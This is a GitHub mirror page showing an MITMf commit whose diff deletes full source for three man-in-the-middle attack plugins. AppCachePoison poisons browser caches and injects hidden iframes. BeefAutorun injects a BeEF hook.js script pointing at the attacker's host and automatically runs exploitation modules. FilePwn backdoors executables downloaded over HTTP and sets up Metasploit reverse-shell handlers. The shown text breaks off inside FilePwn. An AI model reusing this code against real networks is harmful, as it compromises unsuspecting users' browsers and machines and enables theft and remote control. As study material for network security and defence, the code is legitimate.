mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-08-14 02:37:06 -07:00
This is 1/2 of the work done... lot's of cool stuff!
I've re-written a decent amount of the framework to support dynamic config file updates, revamped the ARP Spoofing 'engine' and changed the way MITMf integrates Responder and Netcreds. - Net-creds is now started by default and no longer a plugin.. It's all about getting those creds after all. - Integrated the Subterfuge Framework's ARPWatch script, it will enable itself when spoofing the whole subnet (also squashed bugs in the original ARP spoofing code) - The spoof plugin now supports specifying a range of targets (e.g. --target 10.10.10.1-15) and multiple targets (e.g. --target 10.10.10.1,10.10.10.2) - An SMB Server is now started by default, MITMf now uses Impacket's SMBserver as supposed to the one built into Responder, mainly for 2 reasons: 1) Impacket is moving towards SMB2 support and is actively developed 2) Impacket's SMB server is fully functional as supposed to Responder's (will be adding a section for it in the config file) 3) Responder's SMB server was unrealiable when used through MITMf (After spending a day trying to figure out why, I just gave up and yanked it out) - Responder's code has been broken down into single importable classes (way easier to manage and read, ugh!) - Started adding dynamic config support to Responder's code and changed the logging messages to be a bit more readable. - POST data captured through the proxy will now only be logged and printed to STDOUT when it's decodable to UTF-8 (this prevents logging encrypted data which is no use) - Responder and the Beefapi script are no longer submodules (they seem to be a pain to package, so i removed them to help a brother out) - Some plugins are missing because I'm currently re-writing them, will be added later - Main plugin class now inharates from the ConfigWatcher class, this way plugins will support dynamic configs natively! \o/
This commit is contained in:
parent
663f38e732
commit
9712eed4a3
92 changed files with 6883 additions and 3349 deletions
|
@ -1,207 +0,0 @@
|
|||
#!/usr/bin/env python2.7
|
||||
|
||||
# Copyright (c) 2014-2016 Marcello Salvati
|
||||
#
|
||||
# This program is free software; you can redistribute it and/or
|
||||
# modify it under the terms of the GNU General Public License as
|
||||
# published by the Free Software Foundation; either version 3 of the
|
||||
# License, or (at your option) any later version.
|
||||
#
|
||||
# This program is distributed in the hope that it will be useful, but
|
||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||
# General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU General Public License
|
||||
# along with this program; if not, write to the Free Software
|
||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
||||
# USA
|
||||
#
|
||||
|
||||
# 99.9999999% of this code was stolen from https://github.com/koto/sslstrip by Krzysztof Kotowicz
|
||||
|
||||
import logging
|
||||
import re
|
||||
import os.path
|
||||
import time
|
||||
import sys
|
||||
|
||||
from plugins.plugin import Plugin
|
||||
from datetime import date
|
||||
from core.sslstrip.URLMonitor import URLMonitor
|
||||
from core.configwatcher import ConfigWatcher
|
||||
|
||||
mitmf_logger = logging.getLogger('mitmf')
|
||||
|
||||
class AppCachePlugin(Plugin):
|
||||
name = "App Cache Poison"
|
||||
optname = "appoison"
|
||||
desc = "Performs App Cache Poisoning attacks"
|
||||
implements = ["handleResponse"]
|
||||
version = "0.3"
|
||||
has_opts = False
|
||||
|
||||
def initialize(self, options):
|
||||
self.options = options
|
||||
self.mass_poisoned_browsers = []
|
||||
self.urlMonitor = URLMonitor.getInstance()
|
||||
|
||||
self.urlMonitor.setAppCachePoisoning()
|
||||
|
||||
def handleResponse(self, request, data):
|
||||
|
||||
self.config = ConfigWatcher.getInstance().getConfig()['AppCachePoison'] # so we reload the config on each request
|
||||
url = request.client.uri
|
||||
req_headers = request.client.getAllHeaders()
|
||||
headers = request.client.responseHeaders
|
||||
ip = request.client.getClientIP()
|
||||
|
||||
#########################################################################
|
||||
|
||||
if "enable_only_in_useragents" in self.config:
|
||||
regexp = self.config["enable_only_in_useragents"]
|
||||
if regexp and not re.search(regexp,req_headers["user-agent"]):
|
||||
mitmf_logger.info("%s Tampering disabled in this useragent (%s)" % (ip, req_headers["user-agent"]))
|
||||
return {'request': request, 'data': data}
|
||||
|
||||
urls = self.urlMonitor.getRedirectionSet(url)
|
||||
mitmf_logger.debug("%s [AppCachePoison] Got redirection set: %s" % (ip, urls))
|
||||
(name,s,element,url) = self.getSectionForUrls(urls)
|
||||
|
||||
if s is False:
|
||||
data = self.tryMassPoison(url, data, headers, req_headers, ip)
|
||||
return {'request': request, 'data': data}
|
||||
|
||||
mitmf_logger.info("%s Found URL %s in section %s" % (ip, url, name))
|
||||
p = self.getTemplatePrefix(s)
|
||||
|
||||
if element == 'tamper':
|
||||
mitmf_logger.info("%s Poisoning tamper URL with template %s" % (ip, p))
|
||||
if os.path.exists(p + '.replace'): # replace whole content
|
||||
f = open(p + '.replace','r')
|
||||
data = self.decorate(f.read(), s)
|
||||
f.close()
|
||||
|
||||
elif os.path.exists(p + '.append'): # append file to body
|
||||
f = open(p + '.append','r')
|
||||
appendix = self.decorate(f.read(), s)
|
||||
f.close()
|
||||
# append to body
|
||||
data = re.sub(re.compile("</body>",re.IGNORECASE),appendix + "</body>", data)
|
||||
|
||||
# add manifest reference
|
||||
data = re.sub(re.compile("<html",re.IGNORECASE),"<html manifest=\"" + self.getManifestUrl(s)+"\"", data)
|
||||
|
||||
elif element == "manifest":
|
||||
mitmf_logger.info("%s Poisoning manifest URL" % ip)
|
||||
data = self.getSpoofedManifest(url, s)
|
||||
headers.setRawHeaders("Content-Type", ["text/cache-manifest"])
|
||||
|
||||
elif element == "raw": # raw resource to modify, it does not have to be html
|
||||
mitmf_logger.info("%s Poisoning raw URL" % ip)
|
||||
if os.path.exists(p + '.replace'): # replace whole content
|
||||
f = open(p + '.replace','r')
|
||||
data = self.decorate(f.read(), s)
|
||||
f.close()
|
||||
|
||||
elif os.path.exists(p + '.append'): # append file to body
|
||||
f = open(p + '.append','r')
|
||||
appendix = self.decorate(f.read(), s)
|
||||
f.close()
|
||||
# append to response body
|
||||
data += appendix
|
||||
|
||||
self.cacheForFuture(headers)
|
||||
self.removeDangerousHeaders(headers)
|
||||
return {'request': request, 'data': data}
|
||||
|
||||
def tryMassPoison(self, url, data, headers, req_headers, ip):
|
||||
browser_id = ip + req_headers.get("user-agent", "")
|
||||
|
||||
if not 'mass_poison_url_match' in self.config: # no url
|
||||
return data
|
||||
if browser_id in self.mass_poisoned_browsers: #already poisoned
|
||||
return data
|
||||
if not headers.hasHeader('content-type') or not re.search('html(;|$)', headers.getRawHeaders('content-type')[0]): #not HTML
|
||||
return data
|
||||
if 'mass_poison_useragent_match' in self.config and not "user-agent" in req_headers:
|
||||
return data
|
||||
if not re.search(self.config['mass_poison_useragent_match'], req_headers['user-agent']): #different UA
|
||||
return data
|
||||
if not re.search(self.config['mass_poison_url_match'], url): #different url
|
||||
return data
|
||||
|
||||
mitmf_logger.debug("Adding AppCache mass poison for URL %s, id %s" % (url, browser_id))
|
||||
appendix = self.getMassPoisonHtml()
|
||||
data = re.sub(re.compile("</body>",re.IGNORECASE),appendix + "</body>", data)
|
||||
self.mass_poisoned_browsers.append(browser_id) # mark to avoid mass spoofing for this ip
|
||||
return data
|
||||
|
||||
def getMassPoisonHtml(self):
|
||||
html = "<div style=\"position:absolute;left:-100px\">"
|
||||
for i in self.config:
|
||||
if isinstance(self.config[i], dict):
|
||||
if self.config[i].has_key('tamper_url') and not self.config[i].get('skip_in_mass_poison', False):
|
||||
html += "<iframe sandbox=\"\" style=\"opacity:0;visibility:hidden\" width=\"1\" height=\"1\" src=\"" + self.config[i]['tamper_url'] + "\"></iframe>"
|
||||
|
||||
return html + "</div>"
|
||||
|
||||
def cacheForFuture(self, headers):
|
||||
ten_years = 315569260
|
||||
headers.setRawHeaders("Cache-Control",["max-age="+str(ten_years)])
|
||||
headers.setRawHeaders("Last-Modified",["Mon, 29 Jun 1998 02:28:12 GMT"]) # it was modifed long ago, so is most likely fresh
|
||||
in_ten_years = date.fromtimestamp(time.time() + ten_years)
|
||||
headers.setRawHeaders("Expires",[in_ten_years.strftime("%a, %d %b %Y %H:%M:%S GMT")])
|
||||
|
||||
def removeDangerousHeaders(self, headers):
|
||||
headers.removeHeader("X-Frame-Options")
|
||||
|
||||
def getSpoofedManifest(self, url, section):
|
||||
p = self.getTemplatePrefix(section)
|
||||
if not os.path.exists(p+'.manifest'):
|
||||
p = self.getDefaultTemplatePrefix()
|
||||
|
||||
f = open(p + '.manifest', 'r')
|
||||
manifest = f.read()
|
||||
f.close()
|
||||
return self.decorate(manifest, section)
|
||||
|
||||
def decorate(self, content, section):
|
||||
for i in section:
|
||||
content = content.replace("%%"+i+"%%", section[i])
|
||||
return content
|
||||
|
||||
def getTemplatePrefix(self, section):
|
||||
if section.has_key('templates'):
|
||||
return self.config['templates_path'] + '/' + section['templates']
|
||||
|
||||
return self.getDefaultTemplatePrefix()
|
||||
|
||||
def getDefaultTemplatePrefix(self):
|
||||
return self.config['templates_path'] + '/default'
|
||||
|
||||
def getManifestUrl(self, section):
|
||||
return section.get("manifest_url",'/robots.txt')
|
||||
|
||||
def getSectionForUrls(self, urls):
|
||||
for url in urls:
|
||||
for i in self.config:
|
||||
if isinstance(self.config[i], dict): #section
|
||||
section = self.config[i]
|
||||
name = i
|
||||
|
||||
if section.get('tamper_url',False) == url:
|
||||
return (name, section, 'tamper',url)
|
||||
|
||||
if section.has_key('tamper_url_match') and re.search(section['tamper_url_match'], url):
|
||||
return (name, section, 'tamper',url)
|
||||
|
||||
if section.get('manifest_url',False) == url:
|
||||
return (name, section, 'manifest',url)
|
||||
|
||||
if section.get('raw_url',False) == url:
|
||||
return (name, section, 'raw',url)
|
||||
|
||||
return (None, False,'',urls.copy().pop())
|
||||
|
||||
|
|
@ -1,131 +0,0 @@
|
|||
#!/usr/bin/env python2.7
|
||||
|
||||
# Copyright (c) 2014-2016 Marcello Salvati
|
||||
#
|
||||
# This program is free software; you can redistribute it and/or
|
||||
# modify it under the terms of the GNU General Public License as
|
||||
# published by the Free Software Foundation; either version 3 of the
|
||||
# License, or (at your option) any later version.
|
||||
#
|
||||
# This program is distributed in the hope that it will be useful, but
|
||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||
# General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU General Public License
|
||||
# along with this program; if not, write to the Free Software
|
||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
||||
# USA
|
||||
#
|
||||
|
||||
import logging
|
||||
import sys
|
||||
import json
|
||||
import threading
|
||||
|
||||
from core.beefapi.beefapi import BeefAPI
|
||||
from core.configwatcher import ConfigWatcher
|
||||
from core.utils import SystemConfig
|
||||
from plugins.plugin import Plugin
|
||||
from plugins.Inject import Inject
|
||||
from time import sleep
|
||||
|
||||
mitmf_logger = logging.getLogger('mitmf')
|
||||
|
||||
class BeefAutorun(Inject, Plugin, ConfigWatcher):
|
||||
name = "BeEFAutorun"
|
||||
optname = "beefauto"
|
||||
desc = "Injects BeEF hooks & autoruns modules based on Browser and/or OS type"
|
||||
tree_output = []
|
||||
depends = ["Inject"]
|
||||
version = "0.3"
|
||||
has_opts = False
|
||||
|
||||
def initialize(self, options):
|
||||
self.options = options
|
||||
self.ip_address = SystemConfig.getIP(options.interface)
|
||||
|
||||
Inject.initialize(self, options)
|
||||
|
||||
self.onConfigChange()
|
||||
|
||||
t = threading.Thread(name="autorun", target=self.autorun, args=())
|
||||
t.setDaemon(True)
|
||||
t.start()
|
||||
|
||||
def onConfigChange(self):
|
||||
|
||||
beefconfig = self.config['MITMf']['BeEF']
|
||||
|
||||
self.html_payload = '<script type="text/javascript" src="http://{}:{}/hook.js"></script>'.format(self.ip_address, beefconfig['beefport'])
|
||||
|
||||
self.beef = BeefAPI({"host": beefconfig['beefip'], "port": beefconfig['beefport']})
|
||||
if not self.beef.login(beefconfig['user'], beefconfig['pass']):
|
||||
sys.exit("[-] Error logging in to BeEF!")
|
||||
|
||||
self.tree_output.append("Mode: {}".format(self.config['BeEFAutorun']['mode']))
|
||||
|
||||
def autorun(self):
|
||||
already_ran = []
|
||||
already_hooked = []
|
||||
|
||||
while True:
|
||||
mode = self.config['BeEFAutorun']['mode']
|
||||
sessions = self.beef.sessions_online()
|
||||
if (sessions is not None and len(sessions) > 0):
|
||||
for session in sessions:
|
||||
|
||||
if session not in already_hooked:
|
||||
info = self.beef.hook_info(session)
|
||||
mitmf_logger.info("{} >> joined the horde! [id:{}, type:{}-{}, os:{}]".format(info['ip'], info['id'], info['name'], info['version'], info['os']))
|
||||
already_hooked.append(session)
|
||||
self.black_ips.append(str(info['ip']))
|
||||
|
||||
if mode == 'oneshot':
|
||||
if session not in already_ran:
|
||||
self.execModules(session)
|
||||
already_ran.append(session)
|
||||
|
||||
elif mode == 'loop':
|
||||
self.execModules(session)
|
||||
sleep(10)
|
||||
|
||||
else:
|
||||
sleep(1)
|
||||
|
||||
def execModules(self, session):
|
||||
session_info = self.beef.hook_info(session)
|
||||
session_ip = session_info['ip']
|
||||
hook_browser = session_info['name']
|
||||
hook_os = session_info['os']
|
||||
all_modules = self.config['BeEFAutorun']["ALL"]
|
||||
targeted_modules = self.config['BeEFAutorun']["targets"]
|
||||
|
||||
if len(all_modules) > 0:
|
||||
mitmf_logger.info("{} >> sending generic modules".format(session_ip))
|
||||
for module, options in all_modules.iteritems():
|
||||
mod_id = self.beef.module_id(module)
|
||||
resp = self.beef.module_run(session, mod_id, json.loads(options))
|
||||
if resp["success"] == 'true':
|
||||
mitmf_logger.info('{} >> sent module {}'.format(session_ip, mod_id))
|
||||
else:
|
||||
mitmf_logger.info('{} >> ERROR sending module {}'.format(session_ip, mod_id))
|
||||
sleep(0.5)
|
||||
|
||||
mitmf_logger.info("{} >> sending targeted modules".format(session_ip))
|
||||
for os in targeted_modules:
|
||||
if (os in hook_os) or (os == hook_os):
|
||||
browsers = targeted_modules[os]
|
||||
if len(browsers) > 0:
|
||||
for browser in browsers:
|
||||
if browser == hook_browser:
|
||||
modules = targeted_modules[os][browser]
|
||||
if len(modules) > 0:
|
||||
for module, options in modules.iteritems():
|
||||
mod_id = self.beef.module_id(module)
|
||||
resp = self.beef.module_run(session, mod_id, json.loads(options))
|
||||
if resp["success"] == 'true':
|
||||
mitmf_logger.info('{} >> sent module {}'.format(session_ip, mod_id))
|
||||
else:
|
||||
mitmf_logger.info('{} >> ERROR sending module {}'.format(session_ip, mod_id))
|
||||
sleep(0.5)
|
File diff suppressed because one or more lines are too long
|
@ -20,7 +20,6 @@
|
|||
|
||||
from plugins.plugin import Plugin
|
||||
|
||||
|
||||
class CacheKill(Plugin):
|
||||
name = "CacheKill"
|
||||
optname = "cachekill"
|
||||
|
|
|
@ -1,652 +0,0 @@
|
|||
#!/usr/bin/env python2.7
|
||||
|
||||
# Copyright (c) 2014-2016 Marcello Salvati
|
||||
#
|
||||
# This program is free software; you can redistribute it and/or
|
||||
# modify it under the terms of the GNU General Public License as
|
||||
# published by the Free Software Foundation; either version 3 of the
|
||||
# License, or (at your option) any later version.
|
||||
#
|
||||
# This program is distributed in the hope that it will be useful, but
|
||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||
# General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU General Public License
|
||||
# along with this program; if not, write to the Free Software
|
||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
||||
# USA
|
||||
#
|
||||
|
||||
# BackdoorFactory Proxy (BDFProxy) v0.2 - 'Something Something'
|
||||
#
|
||||
# Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com
|
||||
#
|
||||
# Copyright (c) 2013-2014, Joshua Pitts
|
||||
# All rights reserved.
|
||||
#
|
||||
# Redistribution and use in source and binary forms, with or without modification,
|
||||
# are permitted provided that the following conditions are met:
|
||||
#
|
||||
# 1. Redistributions of source code must retain the above copyright notice,
|
||||
# this list of conditions and the following disclaimer.
|
||||
#
|
||||
# 2. Redistributions in binary form must reproduce the above copyright notice,
|
||||
# this list of conditions and the following disclaimer in the documentation
|
||||
# and/or other materials provided with the distribution.
|
||||
#
|
||||
# 3. Neither the name of the copyright holder nor the names of its contributors
|
||||
# may be used to endorse or promote products derived from this software without
|
||||
# specific prior written permission.
|
||||
#
|
||||
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
|
||||
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
|
||||
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
|
||||
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
|
||||
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
|
||||
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
|
||||
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
|
||||
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
|
||||
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
|
||||
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
|
||||
# POSSIBILITY OF SUCH DAMAGE.
|
||||
#
|
||||
# Tested on Kali-Linux.
|
||||
|
||||
import sys
|
||||
import os
|
||||
import pefile
|
||||
import zipfile
|
||||
import logging
|
||||
import shutil
|
||||
import random
|
||||
import string
|
||||
import tarfile
|
||||
import multiprocessing
|
||||
import threading
|
||||
|
||||
from libs.bdfactory import pebin
|
||||
from libs.bdfactory import elfbin
|
||||
from libs.bdfactory import machobin
|
||||
from core.msfrpc import Msfrpc
|
||||
from core.configwatcher import ConfigWatcher
|
||||
from plugins.plugin import Plugin
|
||||
from tempfile import mkstemp
|
||||
from configobj import ConfigObj
|
||||
|
||||
mitmf_logger = logging.getLogger('mitmf')
|
||||
|
||||
class FilePwn(Plugin, ConfigWatcher):
|
||||
name = "FilePwn"
|
||||
optname = "filepwn"
|
||||
desc = "Backdoor executables being sent over http using bdfactory"
|
||||
implements = ["handleResponse"]
|
||||
tree_output = ["BDFProxy v0.3.2 online"]
|
||||
version = "0.3"
|
||||
has_opts = False
|
||||
|
||||
def initialize(self, options):
|
||||
'''Called if plugin is enabled, passed the options namespace'''
|
||||
self.options = options
|
||||
|
||||
self.patched = multiprocessing.Queue()
|
||||
|
||||
#FOR FUTURE USE
|
||||
self.binaryMimeTypes = ["application/octet-stream", 'application/x-msdownload', 'application/x-msdos-program', 'binary/octet-stream']
|
||||
|
||||
#FOR FUTURE USE
|
||||
self.zipMimeTypes = ['application/x-zip-compressed', 'application/zip']
|
||||
|
||||
#USED NOW
|
||||
self.magicNumbers = {'elf': {'number': '7f454c46'.decode('hex'), 'offset': 0},
|
||||
'pe': {'number': 'MZ', 'offset': 0},
|
||||
'gz': {'number': '1f8b'.decode('hex'), 'offset': 0},
|
||||
'bz': {'number': 'BZ', 'offset': 0},
|
||||
'zip': {'number': '504b0304'.decode('hex'), 'offset': 0},
|
||||
'tar': {'number': 'ustar', 'offset': 257},
|
||||
'fatfile': {'number': 'cafebabe'.decode('hex'), 'offset': 0},
|
||||
'machox64': {'number': 'cffaedfe'.decode('hex'), 'offset': 0},
|
||||
'machox86': {'number': 'cefaedfe'.decode('hex'), 'offset': 0},
|
||||
}
|
||||
|
||||
#NOT USED NOW
|
||||
#self.supportedBins = ('MZ', '7f454c46'.decode('hex'))
|
||||
|
||||
#FilePwn options
|
||||
self.userConfig = self.config['FilePwn']
|
||||
self.FileSizeMax = self.userConfig['targets']['ALL']['FileSizeMax']
|
||||
self.WindowsIntelx86 = self.userConfig['targets']['ALL']['WindowsIntelx86']
|
||||
self.WindowsIntelx64 = self.userConfig['targets']['ALL']['WindowsIntelx64']
|
||||
self.WindowsType = self.userConfig['targets']['ALL']['WindowsType']
|
||||
self.LinuxIntelx86 = self.userConfig['targets']['ALL']['LinuxIntelx86']
|
||||
self.LinuxIntelx64 = self.userConfig['targets']['ALL']['LinuxIntelx64']
|
||||
self.LinuxType = self.userConfig['targets']['ALL']['LinuxType']
|
||||
self.MachoIntelx86 = self.userConfig['targets']['ALL']['MachoIntelx86']
|
||||
self.MachoIntelx64 = self.userConfig['targets']['ALL']['MachoIntelx64']
|
||||
self.FatPriority = self.userConfig['targets']['ALL']['FatPriority']
|
||||
self.zipblacklist = self.userConfig['ZIP']['blacklist']
|
||||
self.tarblacklist = self.userConfig['TAR']['blacklist']
|
||||
|
||||
#Metasploit options
|
||||
msfcfg = self.config['MITMf']['Metasploit']
|
||||
rpcip = msfcfg['rpcip']
|
||||
rpcpass = msfcfg['rpcpass']
|
||||
|
||||
try:
|
||||
msf = Msfrpc({"host": rpcip}) #create an instance of msfrpc libarary
|
||||
msf.login('msf', rpcpass)
|
||||
version = msf.call('core.version')['version']
|
||||
self.tree_output.append("Connected to Metasploit v{}".format(version))
|
||||
except Exception:
|
||||
sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server")
|
||||
|
||||
self.tree_output.append("Setting up Metasploit payload handlers")
|
||||
jobs = msf.call('job.list')
|
||||
for config in [self.LinuxIntelx86, self.LinuxIntelx64, self.WindowsIntelx86, self.WindowsIntelx64, self.MachoIntelx86, self.MachoIntelx64]:
|
||||
cmd = "use exploit/multi/handler\n"
|
||||
cmd += "set payload {}\n".format(config["MSFPAYLOAD"])
|
||||
cmd += "set LHOST {}\n".format(config["HOST"])
|
||||
cmd += "set LPORT {}\n".format(config["PORT"])
|
||||
cmd += "exploit -j\n"
|
||||
|
||||
if jobs:
|
||||
for pid, name in jobs.iteritems():
|
||||
info = msf.call('job.info', [pid])
|
||||
if (info['name'] != "Exploit: multi/handler") or (info['datastore']['payload'] != config["MSFPAYLOAD"]) or (info['datastore']['LPORT'] != config["PORT"]) or (info['datastore']['lhost'] != config['HOST']):
|
||||
#Create a virtual console
|
||||
c_id = msf.call('console.create')['id']
|
||||
|
||||
#write the cmd to the newly created console
|
||||
msf.call('console.write', [c_id, cmd])
|
||||
else:
|
||||
#Create a virtual console
|
||||
c_id = msf.call('console.create')['id']
|
||||
|
||||
#write the cmd to the newly created console
|
||||
msf.call('console.write', [c_id, cmd])
|
||||
|
||||
def onConfigChange(self):
|
||||
self.initialize(self.options)
|
||||
|
||||
def convert_to_Bool(self, aString):
|
||||
if aString.lower() == 'true':
|
||||
return True
|
||||
elif aString.lower() == 'false':
|
||||
return False
|
||||
elif aString.lower() == 'none':
|
||||
return None
|
||||
|
||||
def bytes_have_format(self, bytess, formatt):
|
||||
number = self.magicNumbers[formatt]
|
||||
if bytess[number['offset']:number['offset'] + len(number['number'])] == number['number']:
|
||||
return True
|
||||
return False
|
||||
|
||||
def binaryGrinder(self, binaryFile):
|
||||
"""
|
||||
Feed potential binaries into this function,
|
||||
it will return the result PatchedBinary, False, or None
|
||||
"""
|
||||
|
||||
with open(binaryFile, 'r+b') as f:
|
||||
binaryTMPHandle = f.read()
|
||||
|
||||
binaryHeader = binaryTMPHandle[:4]
|
||||
result = None
|
||||
|
||||
try:
|
||||
if binaryHeader[:2] == 'MZ': # PE/COFF
|
||||
pe = pefile.PE(data=binaryTMPHandle, fast_load=True)
|
||||
magic = pe.OPTIONAL_HEADER.Magic
|
||||
machineType = pe.FILE_HEADER.Machine
|
||||
|
||||
#update when supporting more than one arch
|
||||
if (magic == int('20B', 16) and machineType == 0x8664 and
|
||||
self.WindowsType.lower() in ['all', 'x64']):
|
||||
add_section = False
|
||||
cave_jumping = False
|
||||
if self.WindowsIntelx64['PATCH_TYPE'].lower() == 'append':
|
||||
add_section = True
|
||||
elif self.WindowsIntelx64['PATCH_TYPE'].lower() == 'jump':
|
||||
cave_jumping = True
|
||||
|
||||
# if automatic override
|
||||
if self.WindowsIntelx64['PATCH_METHOD'].lower() == 'automatic':
|
||||
cave_jumping = True
|
||||
|
||||
targetFile = pebin.pebin(FILE=binaryFile,
|
||||
OUTPUT=os.path.basename(binaryFile),
|
||||
SHELL=self.WindowsIntelx64['SHELL'],
|
||||
HOST=self.WindowsIntelx64['HOST'],
|
||||
PORT=int(self.WindowsIntelx64['PORT']),
|
||||
ADD_SECTION=add_section,
|
||||
CAVE_JUMPING=cave_jumping,
|
||||
IMAGE_TYPE=self.WindowsType,
|
||||
PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx64['PATCH_DLL']),
|
||||
SUPPLIED_SHELLCODE=self.WindowsIntelx64['SUPPLIED_SHELLCODE'],
|
||||
ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx64['ZERO_CERT']),
|
||||
PATCH_METHOD=self.WindowsIntelx64['PATCH_METHOD'].lower()
|
||||
)
|
||||
|
||||
result = targetFile.run_this()
|
||||
|
||||
elif (machineType == 0x14c and
|
||||
self.WindowsType.lower() in ['all', 'x86']):
|
||||
add_section = False
|
||||
cave_jumping = False
|
||||
#add_section wins for cave_jumping
|
||||
#default is single for BDF
|
||||
if self.WindowsIntelx86['PATCH_TYPE'].lower() == 'append':
|
||||
add_section = True
|
||||
elif self.WindowsIntelx86['PATCH_TYPE'].lower() == 'jump':
|
||||
cave_jumping = True
|
||||
|
||||
# if automatic override
|
||||
if self.WindowsIntelx86['PATCH_METHOD'].lower() == 'automatic':
|
||||
cave_jumping = True
|
||||
|
||||
targetFile = pebin.pebin(FILE=binaryFile,
|
||||
OUTPUT=os.path.basename(binaryFile),
|
||||
SHELL=self.WindowsIntelx86['SHELL'],
|
||||
HOST=self.WindowsIntelx86['HOST'],
|
||||
PORT=int(self.WindowsIntelx86['PORT']),
|
||||
ADD_SECTION=add_section,
|
||||
CAVE_JUMPING=cave_jumping,
|
||||
IMAGE_TYPE=self.WindowsType,
|
||||
PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx86['PATCH_DLL']),
|
||||
SUPPLIED_SHELLCODE=self.WindowsIntelx86['SUPPLIED_SHELLCODE'],
|
||||
ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx86['ZERO_CERT']),
|
||||
PATCH_METHOD=self.WindowsIntelx86['PATCH_METHOD'].lower()
|
||||
)
|
||||
|
||||
result = targetFile.run_this()
|
||||
|
||||
elif binaryHeader[:4].encode('hex') == '7f454c46': # ELF
|
||||
|
||||
targetFile = elfbin.elfbin(FILE=binaryFile, SUPPORT_CHECK=False)
|
||||
targetFile.support_check()
|
||||
|
||||
if targetFile.class_type == 0x1:
|
||||
#x86CPU Type
|
||||
targetFile = elfbin.elfbin(FILE=binaryFile,
|
||||
OUTPUT=os.path.basename(binaryFile),
|
||||
SHELL=self.LinuxIntelx86['SHELL'],
|
||||
HOST=self.LinuxIntelx86['HOST'],
|
||||
PORT=int(self.LinuxIntelx86['PORT']),
|
||||
SUPPLIED_SHELLCODE=self.LinuxIntelx86['SUPPLIED_SHELLCODE'],
|
||||
IMAGE_TYPE=self.LinuxType
|
||||
)
|
||||
result = targetFile.run_this()
|
||||
elif targetFile.class_type == 0x2:
|
||||
#x64
|
||||
targetFile = elfbin.elfbin(FILE=binaryFile,
|
||||
OUTPUT=os.path.basename(binaryFile),
|
||||
SHELL=self.LinuxIntelx64['SHELL'],
|
||||
HOST=self.LinuxIntelx64['HOST'],
|
||||
PORT=int(self.LinuxIntelx64['PORT']),
|
||||
SUPPLIED_SHELLCODE=self.LinuxIntelx64['SUPPLIED_SHELLCODE'],
|
||||
IMAGE_TYPE=self.LinuxType
|
||||
)
|
||||
result = targetFile.run_this()
|
||||
|
||||
elif binaryHeader[:4].encode('hex') in ['cefaedfe', 'cffaedfe', 'cafebabe']: # Macho
|
||||
targetFile = machobin.machobin(FILE=binaryFile, SUPPORT_CHECK=False)
|
||||
targetFile.support_check()
|
||||
|
||||
#ONE CHIP SET MUST HAVE PRIORITY in FAT FILE
|
||||
|
||||
if targetFile.FAT_FILE is True:
|
||||
if self.FatPriority == 'x86':
|
||||
targetFile = machobin.machobin(FILE=binaryFile,
|
||||
OUTPUT=os.path.basename(binaryFile),
|
||||
SHELL=self.MachoIntelx86['SHELL'],
|
||||
HOST=self.MachoIntelx86['HOST'],
|
||||
PORT=int(self.MachoIntelx86['PORT']),
|
||||
SUPPLIED_SHELLCODE=self.MachoIntelx86['SUPPLIED_SHELLCODE'],
|
||||
FAT_PRIORITY=self.FatPriority
|
||||
)
|
||||
result = targetFile.run_this()
|
||||
|
||||
elif self.FatPriority == 'x64':
|
||||
targetFile = machobin.machobin(FILE=binaryFile,
|
||||
OUTPUT=os.path.basename(binaryFile),
|
||||
SHELL=self.MachoIntelx64['SHELL'],
|
||||
HOST=self.MachoIntelx64['HOST'],
|
||||
PORT=int(self.MachoIntelx64['PORT']),
|
||||
SUPPLIED_SHELLCODE=self.MachoIntelx64['SUPPLIED_SHELLCODE'],
|
||||
FAT_PRIORITY=self.FatPriority
|
||||
)
|
||||
result = targetFile.run_this()
|
||||
|
||||
elif targetFile.mach_hdrs[0]['CPU Type'] == '0x7':
|
||||
targetFile = machobin.machobin(FILE=binaryFile,
|
||||
OUTPUT=os.path.basename(binaryFile),
|
||||
SHELL=self.MachoIntelx86['SHELL'],
|
||||
HOST=self.MachoIntelx86['HOST'],
|
||||
PORT=int(self.MachoIntelx86['PORT']),
|
||||
SUPPLIED_SHELLCODE=self.MachoIntelx86['SUPPLIED_SHELLCODE'],
|
||||
FAT_PRIORITY=self.FatPriority
|
||||
)
|
||||
result = targetFile.run_this()
|
||||
|
||||
elif targetFile.mach_hdrs[0]['CPU Type'] == '0x1000007':
|
||||
targetFile = machobin.machobin(FILE=binaryFile,
|
||||
